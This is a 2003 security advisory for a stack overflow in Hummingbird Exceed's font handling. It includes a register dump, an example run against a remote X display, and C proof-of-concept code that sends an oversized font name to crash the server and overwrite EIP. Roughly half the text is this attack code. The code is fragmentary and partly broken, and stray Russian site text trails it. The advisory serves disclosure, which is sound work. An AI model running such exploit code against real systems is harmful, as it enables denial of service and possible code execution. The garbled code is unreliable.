$ An open security advisory #2 - Hummingbird Exceed (All Versions) POC Code


1: Bug Researcher: c0ntex@hushmail.com

2: Bug Released: August 2003

3: Bug Impact Rate: Medium / Hi

4: Bug Scope Rate: Remote / Local



HQOTD: "How secure do you want it"


I'll tell you: Much more please sirs.


Exceed has some bugs caused by the way it handles fonts in a local and remote context.

By requesting the use of a font from an Exceed database, providing the font name is

either longer than the defined buffer or the font has been prepared as hostile code,

a stack based overflow will occur. This will allow the execution of external commands

on the vulnerable system.

Obviously it's possible to cause a denial of service (DOS) attack on a machine running

Exceed too.

By sending an X Term window or any other X application to Exceed, loading a large font

name or creating a large window title, we can corrupt the stack and cause Exceed to


Windows Stack Trace:


EAX = C0000000

EBX = 00000000

ECX = 40000000

EDX = 00000501

ESI = 41414141

EDI = 0012E138

EIP = 41414141

ESP = 0012E0C8

EBP = 0012E0F0

[-] We can crash a local Exceed server * 2

[-] We can crash a remote Exceed server * many

[-] We can crash Exceed client * many

[-] We can write over EIP address * many

See the POC code below for more information.

Example Run:


[c0ntex@darkside exceed]$ gcc -o exceed exceed.c -lX11 -L /usr/X11R6/lib

[c0ntex@darkside exceed]$ ./exceed exploited:0.0

[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com

[-] We are using DISPLAY variable: exploited:0.0

[-] Hang on to your feathers, sending some buffer


XIO: fatal IO error 104 (Connection reset by peer) on X server "exploited:0.0"

after 11 requests (9 known processed) with 0 events remaining.

Remote Font Server:


If you find that you use remote font servers with Exceed, a way to check that the server

is not trying to exploit your PC could be:

$ xlsfonts -display exceed_server:0.0







$ Hummingbird informed 3 weeks ago, still no reply.

$ Work around: Uninstall Exceed until a patch has been released.








#define BIGBIRD 6001

#define DIRTY_VAL 69

#define MAX_BORDER_LEN 3

#define WIN_TIMER 5

#define WIN_TITLE "simple PoC window - lets shoot birds"

typedef char Birds;

int main(int argc, char *argv[])


Birds nests[BIGBIRD];

Birds egg[2] = { 'A', '\0' };

Birds *feathersN;


unsigned short eggs, chicks;

unsigned short winW, winH, feathersW, feathersH;

unsigned long locX, locY;

unsigned long winBDR;

Display* feathers;

Window wingspan;

XFontStruct* birdcull;

fprintf(stderr, "\n\n[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com\n");

if(argc < 2) {

fprintf(stderr, "[-] Please set IP/Hostname for DISPLAY pointer!\n");

fprintf(stderr, "[-] Usage: %s \n\n", argv[0]);



if(setenv(HABITAT, argv[1], 1) <0) { /*;p*/

perror("setenv"); return EXIT_FAILURE;


fprintf(stderr, "[-] Ok, using DISPLAY variable: %s\n", argv[1]);

for(eggs = 0; eggs < BIGBIRD -1; eggs++)

if(strncat(nests, egg, sizeof(BIGBIRD)-1) == NULL) {

perror("strncat"); return EXIT_FAILURE;


if((feathers = XOpenDisplay(feathersN)) == NULL) {

perror("XOpenDisplay"); return EXIT_FAILURE;


chicks = DefaultScreen(feathers);

winW = ((feathersW = DisplayWidth(feathers, chicks)) /3);

winH = ((feathersH = DisplayHeight(feathers, chicks)) /3);


wingspan = XCreateSimpleWindow(feathers, RootWindow(feathers, chicks),

locX, locY, winW, winH, winBDR,

BlackPixel(feathers, chicks),

WhitePixel(feathers, chicks));

if(XCreateSimpleWindow == NULL) {

perror("XCreateSimpleWindow"); return EXIT_FAILURE;


XStoreName(feathers, wingspan, WIN_TITLE);

if(XStoreName == NULL) {

perror("XOpenDisplay"); return EXIT_FAILURE;


XMapWindow(feathers, wingspan);

if(XMapWindow == NULL) {

perror("XOpenDisplay"); return EXIT_FAILURE;


fprintf(stderr, "[-] Hang on to your feathers, sending some buffer \n\n");

if((birdcull = XLoadQueryFont(feathers, nests)) == NULL) {

perror("XLoadQueryFont"); return EXIT_FAILURE;





Ведете ли вы блог?


Результаты опроса

Новостной блок